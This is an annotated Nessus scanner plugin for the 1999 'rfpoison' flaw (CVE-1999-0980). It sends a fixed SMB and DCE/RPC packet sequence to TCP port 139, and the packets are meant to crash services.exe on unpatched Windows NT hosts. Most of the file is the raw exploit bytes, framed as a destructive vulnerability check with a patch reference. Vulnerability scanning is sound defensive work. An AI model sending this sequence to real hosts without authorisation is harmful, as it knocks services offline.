
#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#
# Nessus plugin 10204 ("rfpoison", CVE-1999-0980 / BID 754): a
# denial-of-service check against the NetBIOS session service on
# TCP/139.  This first block is the registration pass: when the scanner
# loads the plugin with `description` set it only publishes metadata
# and exits; the test itself is the code after the block.
 
if(description)
{
 script_id(10204);
 script_bugtraq_id(754);
 script_version ("$Revision: 1.16 $");
 script_cve_id("CVE-1999-0980");
 name["english"] = "rfpoison";
 name["francais"] = "rfpoison";
 script_name(english:name["english"], francais:name["francais"]);
 
 # Report text.  The wording ("It may be possible", "If you see that
 # this attack was successful") is deliberate: the test body sends the
 # packets and reports unconditionally, it never confirms the crash.
 desc["english"] = "It may be possible
to make the remote server crash
using the 'rfpoison' attack. 
 
An attacker may use this flaw to
shut down this server, thus 
preventing your network from
working properly.
 
 
Solution: See Microsoft Technet 
http://support.microsoft.com/support/kb/articles/Q231/4/57.ASP
 
Risk factor : High";
 
 
 # NOTE(review): the 'Θ' characters below are almost certainly a
 # code-page rendering of 'é' (Latin-1 0xE9 displayed as CP437).  They
 # are runtime report strings, so they are left exactly as found.
 desc["francais"] = "Il peut  s'avΘrer
possible de faire planter la 
machine distante en utilisant
l'attaque 'rfpoison'. 
 
Un pirate peut utiliser cette
attaque pour empecher votre
rΘseau de fonctionner normallement.
 
Solution : Cf http://support.microsoft.com/support/kb/articles/Q231/4/57.ASP
 
Facteur de risque : ElevΘ";
 
 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Crashes the remote host using the 'rfpoison' attack";
 summary["francais"] = "Plante le serveur distant en utilisant l'attaque 'rfpoison'";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 # ACT_DENIAL flags this as a destructive check: the report text says the
 # packets are meant to crash the target's services.exe.  As far as I
 # recall the scanner only launches ACT_DENIAL plugins when "safe checks"
 # is disabled -- confirm for the scanner version in use before
 # scheduling it against production hosts.
 script_category(ACT_DENIAL);
 
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
        francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 family["english"] = "Denial of Service";
 family["francais"] = "DΘni de service";
 script_family(english:family["english"], francais:family["francais"]);
 
 # Only scheduled when TCP/139 is among the target's open ports.
 script_require_ports(139);
 exit(0);
}
  64.  
#
# The script code starts here
#
# Test body: sends the fixed 'rfpoison' packet sequence to TCP/139 and
# then reports.  Nothing in the target's replies is examined, so the
# outcome (crash or not) is unknown to the plugin.
 
# Skip hosts whose SMB-reported Windows version looks like 5.x or later
# (presumably NT 5.0 = Windows 2000 onward -- confirm against the KB
# article referenced in the report).  Runs against the host if the KB
# entry is absent.
# NOTE(review): ereg() is a substring match as far as I know, and the
# pattern is unanchored with an optional dot ('\.*'), so any digit 5-9
# anywhere in the version string skips the test.  '^[5-9]\.' would say
# what is meant; left as-is, since the looseness only ever suppresses
# the packets, never sends them to more hosts.
version = get_kb_item("SMB/WindowsVersion");
if( version )
{
 if(ereg(pattern:"[5-9]\.*", string:version))exit(0);
}
 
 
# Only act if the port scanner found TCP/139 open.
if(get_port_state(139))
{
 soc = open_sock_tcp(139);
 if(soc)
 {
 
#
# This is the result of rfp's secret program. I don't pretend
# I understand it, but it works.
#
# Reading the bytes: the seven packets are an ordinary SMB session
# establishment followed by one DCE/RPC call on the \srvsvc pipe.  Each
# reply is read (recv) so the exchange stays in step, but never
# inspected.  The blobs reproduce the original rfpoison proof-of-concept
# and should be treated as a fixed fixture: a changed length byte breaks
# the sequence silently.
 
# 1. NetBIOS session request (type 0x81).  The two first-level-encoded
#    names decode to called "*SMBSERVER" and calling "GATEKEEPER".
data = raw_string(0x81,0x0,0x0,0x48,0x20,0x43,0x4b,0x46,0x44,0x45,0x4e,0x45,0x43,0x46,0x44,0x45,0x46,0x46,0x43,0x46,0x47,0x45,0x46,0x46,0x43,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x0,0x20,0x45,0x48,0x45,0x42,0x46,0x45,0x45,0x46,0x45,0x4c,0x45,0x46,0x45,0x46,0x46,0x41,0x45,0x46,0x46,0x43,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x0,0x0,0x0,0x0,0x0);
 
send(socket:soc, data:data);
recv(socket:soc, length:1024);   # reply discarded; only keeps the exchange in step
 
# 2. SMB_COM_NEGOTIATE (0x72) offering the dialects "PC NETWORK PROGRAM
#    1.0" through "NT LM 0.12" (the strings are readable in the blob).
data = raw_string(0x0,0x0,0x0,0xa4,0xff,0x53,0x4d,0x42,0x72,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x0,0x1,0x0,0x0,0x81,0x0,0x2,0x50,0x43,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x20,0x50,0x52,0x4f,0x47,0x52,0x41,0x4d,0x20,0x31,0x2e,0x30,0x0,0x2,0x4d,0x49,0x43,0x52,0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x31,0x2e,0x30,0x33,0x0,0x2,0x4d,0x49,0x43,0x52,0x4f,0x53,0x4f,0x46,0x54,0x20,0x4e,0x45,0x54,0x57,0x4f,0x52,0x4b,0x53,0x20,0x33,0x2e,0x30,0x0,0x2,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x31,0x2e,0x30,0x0,0x2,0x4c,0x4d,0x31,0x2e,0x32,0x58,0x30,0x30,0x32,0x0,0x2,0x53,0x61,0x6d,0x62,0x61,0x0,0x2,0x4e,0x54,0x20,0x4c,0x41,0x4e,0x4d,0x41,0x4e,0x20,0x31,0x2e,0x30,0x0,0x2,0x4e,0x54,0x20,0x4c,0x4d,0x20,0x30,0x2e,0x31,0x32,0x0);
 
send(socket:soc, data:data);
recv(socket:soc, length:1024);   # reply discarded
 
# 3. SMB_COM_SESSION_SETUP_ANDX (0x73); the trailing strings identify
#    the client as "Samba" on "Unix" in domain "WORKGROUP".
data = raw_string(0x0,0x0,0x0,0x54,0xff,0x53,0x4d,0x42,0x73,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x0,0x1,0x0,0xd,0xff,0x0,0x0,0x0,0xff,0xff,0x2,0x0,0xf4,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x17,0x0,0x0,0x0,0x57,0x4f,0x52,0x4b,0x47,0x52,0x4f,0x55,0x50,0x0,0x55,0x6e,0x69,0x78,0x0,0x53,0x61,0x6d,0x62,0x61,0x0);
 
send(socket:soc, data:data);
recv(socket:soc, length:1024);   # reply discarded
 
# 4. SMB_COM_TREE_CONNECT_ANDX (0x75) to "\\*SMBSERVER\IPC$", service "IPC".
data = raw_string(0x0,0x0,0x0,0x42,0xff,0x53,0x4d,0x42,0x75,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xf4,0x1,0x0,0x8,0x1,0x0,0x4,0xff,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x17,0x0,0x0,0x5c,0x5c,0x2a,0x53,0x4d,0x42,0x53,0x45,0x52,0x56,0x45,0x52,0x5c,0x49,0x50,0x43,0x24,0x0,0x49,0x50,0x43,0x0);
 
send(socket:soc, data:data);
recv(socket:soc, length:1024);   # reply discarded
 
# 5. SMB_COM_NT_CREATE_ANDX (0xa2) opening the "\srvsvc" named pipe.
data = raw_string(0x0,0x0,0x0,0x5b,0xff,0x53,0x4d,0x42,0xa2,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x18,0xff,0x0,0x0,0x0,0x0,0x7,0x0,0x6,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x9f,0x1,0x2,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x3,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x0,0x8,0x0,0x5c,0x73,0x72,0x76,0x73,0x76,0x63,0x0);
 
send(socket:soc, data:data);
recv(socket:soc, length:1024);   # reply discarded
 
# 6. SMB_COM_TRANSACTION (0x25) on "\PIPE\" carrying a DCE/RPC bind
#    (header bytes 0x05 0x00 0x0b).  The interface UUID bytes are those
#    of the srvsvc interface, as far as I recall -- confirm.
data = raw_string(0x0,0x0,0x0,0x94,0xff,0x53,0x4d,0x42,0x25,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x10,0x0,0x0,0x48,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4c,0x0,0x48,0x0,0x4c,0x0,0x2,0x0,0x26,0x0,0x0,0x8,0x51,0x0,0x5c,0x50,0x49,0x50,0x45,0x5c,0x0,0x0,0x0,0x5,0x0,0xb,0x0,0x10,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x30,0x16,0x30,0x16,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0xc8,0x4f,0x32,0x4b,0x70,0x16,0xd3,0x1,0x12,0x78,0x5a,0x47,0xbf,0x6e,0xe1,0x88,0x3,0x0,0x0,0x0,0x4,0x5d,0x88,0x8a,0xeb,0x1c,0xc9,0x11,0x9f,0xe8,0x8,0x0,0x2b,0x10,0x48,0x60,0x2,0x0,0x0,0x0);
 
send(socket:soc, data:data);
recv(socket:soc, length:1024);   # reply discarded
 
# 7. SMB_COM_TRANSACTION (0x25) carrying the DCE/RPC request (header
#    0x05 0x00 0x00 0x03, opnum 0x000f) that an unpatched host mishandles;
#    the KB article quoted in the report is the fix.  This is the only
#    packet specific to the bug; the six before it are plain setup.
data = raw_string(0x0,0x0,0x0,0xa4,0xff,0x53,0x4d,0x42,0x25,0x0,0x0,0x0,0x0,0x8,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0xf4,0x1,0x0,0x8,0x1,0x0,0x10,0x0,0x0,0x58,0x0,0x0,0x0,0x58,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x4c,0x0,0x58,0x0,0x4c,0x0,0x2,0x0,0x26,0x0,0x0,0x8,0x61,0x0,0x5c,0x50,0x49,0x50,0x45,0x5c,0x0,0x0,0x0,0x5,0x0,0x0,0x3,0x10,0x0,0x0,0x0,0x58,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x0,0x0,0xf,0x0,0x1,0x0,0x0,0x0,0xd,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xd,0x0,0x0,0x0,0x5c,0x0,0x5c,0x0,0x2a,0x0,0x53,0x0,0x4d,0x0,0x42,0x0,0x53,0x0,0x45,0x0,0x52,0x0,0x56,0x0,0x45,0x0,0x52,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0);
 
send(socket:soc, data:data);
recv(socket:soc, length:1024);   # reply discarded
 
# Reported unconditionally once the packets have gone out: a hit from
# this plugin means "sequence delivered", not "crash confirmed".  Check
# the target (services.exe state, event log) before treating it as a
# finding.
msg = "A 'rfpoison' packet has been sent to the remote host.
This packet is supposed to crash the 'services.exe' process,
rendering the system instable.
If you see that this attack was successful, have a look
at this page : 
   http://support.microsoft.com/support/kb/articles/Q231/4/57.ASP";
 
security_warning(port:139, data:msg);
close(soc);
 }
}